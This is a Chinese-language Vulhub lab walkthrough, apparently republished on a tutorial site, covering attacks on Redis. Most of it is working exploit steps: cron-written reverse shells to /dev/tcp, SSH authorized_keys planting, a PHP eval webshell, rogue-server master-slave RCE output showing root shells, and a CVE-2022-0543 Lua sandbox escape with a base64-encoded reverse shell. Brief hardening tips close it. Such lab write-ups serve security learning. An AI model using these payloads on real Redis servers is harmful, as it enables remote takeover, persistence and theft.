Vulhub 漏洞学习之:Redis
2022/5/25 2:21:45
本文主要是介绍Vulhub 漏洞学习之:Redis,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
Vulhub 漏洞学习之:Redis
1 Redis简介
Redis 是完全开源的,遵守 BSD 协议,是一个高性能的 key-value 数据库。Redis 与其他 key - value 缓存产品有以下三个特点:
- Redis支持数据的持久化,可以将内存中的数据保存在磁盘中,重启的时候可以再次加载进行使用。
- Redis不仅仅支持简单的key-value类型的数据,同时还提供list,set,zset,hash等数据结构的存储。
- Redis支持数据的备份,即master-slave模式的数据备份。
Redis 优势
- 性能极高:Redis能读的速度是110000次/s,写的速度是81000次/s 。
- 丰富的数据类型:Redis支持二进制案例的 Strings, Lists, Hashes, Sets 及 Ordered Sets 数据类型操作。
- 原子性:Redis的所有操作都是原子性的,意思就是要么成功执行要么失败完全不执行。单个操作是原子性的。多个操作也支持事务,即原子性,通过MULTI和EXEC指令包起来。
- 丰富的特性:Redis还支持 publish/subscribe, 通知, key 过期等等特性。
2. 安装Redis
2.1 Docker安装测试环境
docker pull redis docker run -p 6379:6379 -d redis
-p
将容器的6379端口映射到主机的6379端口。-d
将容器后台运行。
2.2 安装Redis客户端
tar -zxf redis-7.0.0.tar.gz cd redis-7.0.0 make cp src/redis-cli /usr/bin // 测试连接 redis-cli -h your_host -p 6379 -a "pass" --raw
-h
: 远程连接的主机-p
: 远程连接的端口-a
: 密码--raw
:解决中文乱码。
2.3 Redis 基础命令
-
ping
: 检测 redis 服务是否启动,启动返回PONG。192.168.210.13:6379> PING PONG
-
info
192.168.210.13:6379> info # Server redis_version:7.0.0 redis_git_sha1:00000000 redis_git_dirty:0
3 Redis 漏洞利用
3.1 利用计划任务反弹shell
3.1.1 kali 监听端口
nc -nvlp 2333
3.1.2 远程连接Redis服务器并写入反弹Payload
// 设置key set getshell "\n* * * * * bash -i >& /dev/tcp/192.168.210.10/2333 0>&1\n" // 设置路径 config set dir /var/spool/cron/ // 设置文件名 config set dbfilename root // 保存key值到root文件中 save // 命令行直接写入 echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/192.168.210.10/2333 0>&1\n\n"|redis-cli -h 192.168.210.13 -x set getshell redis-cli -h 192.168.210.13 config set dir /var/spool/cron/ redis-cli -h 192.168.210.13 config set dbfilename root redis-cli -h 192.168.210.13 save
3.2 利用写入公钥登录ssh
3.2.1 kali 生成公私钥
// 生成公私钥 ssh-keygen -t rsa // 防止乱码,导出key (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt // 导入内容 cat key.txt| redis-cli -h 192.168.210.13 -x set putsshkey // 若知道目标Redis服务器的密码,可以加--pass参数 cat key.txt| redis-cli -h 192.168.210.13 -x set putsshkey --pass your-passwd
3.2.2 远程连接Redis服务器并写入公钥
// 设置路径 config set dir /root/.ssh // 设置文件名 config set dbfilename authorized_keys // 保存key值到root文件中 save
3.2.3 kali 远程登录目标系统
ssh -i id_rsa root@192.168.210.13
3.3 利用写入WEBShell连接远程服务器
3.3.1 远程连接Redis服务器并写入WEBShell
config set dir /var/www/html/ config set dbfilename webshell.php set x '<?php @eval($_GET["cmd"]);phpinfo();?>' save
3.4 Redis 4.x/5.x 主从复制导致的命令执行
Redis主从复制RCE漏洞存在于4.x、5.x版本中,Redis提供了主从模式,主从模式指使用一个redis作为主机,其他的作为备份机,主机从机数据都是一样的,从机只负责读,主机只负责写。在Reids 4.x之后,通过外部拓展,可以实现在redis中实现一个新的Redis命令,构造恶意.so文件。在两个Redis实例设置主从模式的时候,Redis的主机(此处为kali)实例可以通过FULLRESYNC同步文件到从机(此处为CentOS)上。然后在从机上加载恶意so文件,即可执行命令。
3.4.1 EXP 下载
- GitHub - n0b0dyCN/redis-rogue-server: Redis(<=5.0.5) RCE
- GitHub - Testzero-wz/Awsome-Redis-Rogue-Server: Redis-Rogue-Server Implement
3.4.2 EXP 利用过程
# python3 redis-rogue-server.py --rhost 192.168.210.13 --lhost 192.168.210.10 ______ _ _ ______ _____ | ___ \ | (_) | ___ \ / ___| | |_/ /___ __| |_ ___ | |_/ /___ __ _ _ _ ___ \ `--. ___ _ ____ _____ _ __ | // _ \/ _` | / __| | // _ \ / _` | | | |/ _ \ `--. \/ _ \ '__\ \ / / _ \ '__| | |\ \ __/ (_| | \__ \ | |\ \ (_) | (_| | |_| | __/ /\__/ / __/ | \ V / __/ | \_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_| \_/ \___|_| __/ | |___/ @copyright n0b0dy @ r3kapig [info] TARGET 192.168.210.13:6379 [info] SERVER 192.168.210.10:21000 [info] Setting master... [info] Setting dbfilename... [info] Loading module... [info] Temerory cleaning up... // Interactive shell What do u want, [i]nteractive shell or [r]everse shell: i [info] Interact mode start, enter "exit" to quit. [<<] id [>>] uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 // Reverse shell What do u want, [i]nteractive shell or [r]everse shell: r [info] Open reverse shell... Reverse server address: 192.168.210.10 Reverse server port: 2333 [info] Reverse shell payload sent. [info] Check at 192.168.210.10:2333 [info] Unload module... // kali监听 └─$ nc -nvlp 2333 listening on [any] 2333 ... connect to [192.168.210.10] from (UNKNOWN) [192.168.210.13] 39390 id uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
3.4.3 本地利用Redis主从复制RCE
// kali # python3 redis_rogue_server.py -v -path ../redis-rogue-server-master/exp.so [*] Listening on port: 15000 # nc -nvlp 2333 listening on [any] 2333 ... // 在目标主机本地上执行以下命令: [root@ac ~]# redis-cli 127.0.0.1:6379> config set dir /tmp OK 127.0.0.1:6379> CONFIG SET dbfilename exp.so OK 127.0.0.1:6379> SLAVEOF 192.168.210.10 15000 OK 127.0.0.1:6379> module load ./exp.so OK 127.0.0.1:6379> slaveof NO ONE OK 127.0.0.1:6379> system.rev 192.168.210.10 2333
3.5 利用SSRF攻击Redis服务器反弹shell
ssrf漏洞利用(内网探测、打redis) - ctrl_TT豆 - 博客园 (cnblogs.com)
3.6 Redis Lua沙盒绕过命令执行(CVE-2022-0543)
Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package
,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。
3.6.1 远程执行命令
我们借助Lua沙箱中遗留的变量package
的loadlib
函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0
里的导出函数luaopen_io
。在Lua中执行这个导出函数,即可获得io
库,再使用其执行命令:
local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res
注意:不同环境下的liblua库路径不同,你需要指定一个正确的路径。在我们Vulhub环境(Ubuntu fiocal)中,这个路径是/usr/lib/x86_64-linux-gnu/liblua5.1.so.0
。
连接redis,使用eval
命令执行上述脚本:
$ redis-cli -h 192.168.210.13 192.168.210.13:6379> eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0 "uid=0(root) gid=0(root) groups=0(root)\n"
3.6.1 反弹shell
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxMC4xMC8yMzMzIDA+JjEK |base64 -d |bash -i", "r"); local res = f:read("*a"); f:close(); return res' 0
成功反弹:
$ nc -nvlp 2333 listening on [any] 2333 ... connect to [192.168.210.10] from (UNKNOWN) [192.168.210.13] 57516 bash: cannot set terminal process group (1): Inappropriate ioctl for device bash: no job control in this shell root@6d4a5a7a8313:/var/lib/redis# id id uid=0(root) gid=0(root) groups=0(root) root@6d4a5a7a8313:/var/lib/redis#
4 redis安全配置
- 以普通账号启动redis服务
- 监听本地或特定主机
- 开启 protected-mode
- 更改默认6379端口
- 为redis设置密码
这篇关于Vulhub 漏洞学习之:Redis的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-12-24Redis资料:新手入门快速指南
- 2024-12-24Redis资料:新手入门教程与实践指南
- 2024-12-24Redis资料:新手入门教程与实践指南
- 2024-12-07Redis高并发入门详解
- 2024-12-07Redis缓存入门:新手必读指南
- 2024-12-07Redis缓存入门:新手必读教程
- 2024-12-07Redis入门:新手必备的简单教程
- 2024-12-07Redis入门:新手必读的简单教程
- 2024-12-06Redis入门教程:从安装到基本操作
- 2024-12-06Redis缓存入门教程:轻松掌握缓存技巧